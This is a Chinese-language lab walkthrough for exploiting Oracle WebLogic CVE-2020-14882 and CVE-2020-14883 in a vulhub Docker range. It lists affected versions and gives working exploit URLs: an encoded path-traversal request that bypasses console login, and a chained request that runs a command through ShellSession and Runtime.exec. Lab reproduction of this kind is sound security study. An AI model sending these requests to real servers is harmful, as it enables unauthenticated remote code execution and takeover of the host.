weblogic CVE-2020-14882 靶场攻略
漏洞描述
32
CVE-2020-14882 允许远程⽤户绕过管理员控制台组件中的身份验证。
CVE-2020-14883 允许经过身份验证的⽤户在管理员控制台组件上执⾏任何命令。
使⽤这两个漏洞链,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执⾏任意命令并完全控制主机
影响版本
Oracle Weblogic Server 10.3.6.0
Oracle Weblogic Server 12.1.3.0
Oracle Weblogic Server 12.2.1.3
Oracle Weblogic Server 12.2.1.4
Oracle Weblogic Server 14.1.1.0
环境搭建
cd vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d
漏洞复现
1.访问管理控制台
http://172.16.1.78:7001/console/login/LoginForm.jsp
2.使⽤以下url绕过登录认证
http://172.16.1.78:7001
/console/css/%252e%252e%252fconsole.portal
此时达到未授权得效果。还未能GetShell。可以利⽤第⼆个漏洞(CVE-2020-14883),远程加载XML⽂件拿到Shell
3.⾸先访问以下 URL ,以连接 2 个漏洞并执⾏以下命令
http://172.16.1.78:7001/
console/css/%252e%252e%252fconsole.portal?
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti
me.getRuntime().exec('touch%20/tmp/success');")
我们进⼊到docker中可以看到命令已经成功运⾏了